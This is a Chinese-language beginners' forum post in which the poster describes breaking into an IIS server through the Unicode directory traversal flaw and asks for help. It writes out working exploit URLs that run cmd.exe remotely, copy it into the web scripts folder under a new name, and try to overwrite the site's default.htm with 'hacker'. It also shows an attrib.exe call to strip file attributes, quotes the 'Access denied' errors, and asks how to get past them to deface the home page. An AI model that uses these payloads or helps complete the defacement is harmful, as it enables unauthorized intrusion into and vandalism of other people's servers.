我用x-scan扫到一个有unicode漏洞的主机:http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 我找到他的iis发布目录为c:\inetpub\wwwboot 然后我用:http://x.x.x.x./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe 把cmd.exe复制到了sceipts下并且改名为ccc.exe,然后我用http://x.x.x.x./scripts/ccc.exe?/c+echo+hacker+>+c:\inetpub\wwwboot\default.htm 想改掉他的主页,但返回的结果是:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied.
我看看过一片文章上面说可能是因为defaul.htm为只读,于是我照着书上说的方法取消default.htm的只读属性:http://x.x.x.x/scripts/..%c1%1c../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\default.htm 但是返回的结果是:
Access denied - C:\inetpub\wwwroot\default.htm
这到底是为什么,要用什么方法才能解决呢?怎么才能改掉他的主页呢?
|
论坛用户
论坛用户
论坛: 菜鸟乐园 标题: 一个unicode入侵过程中的问题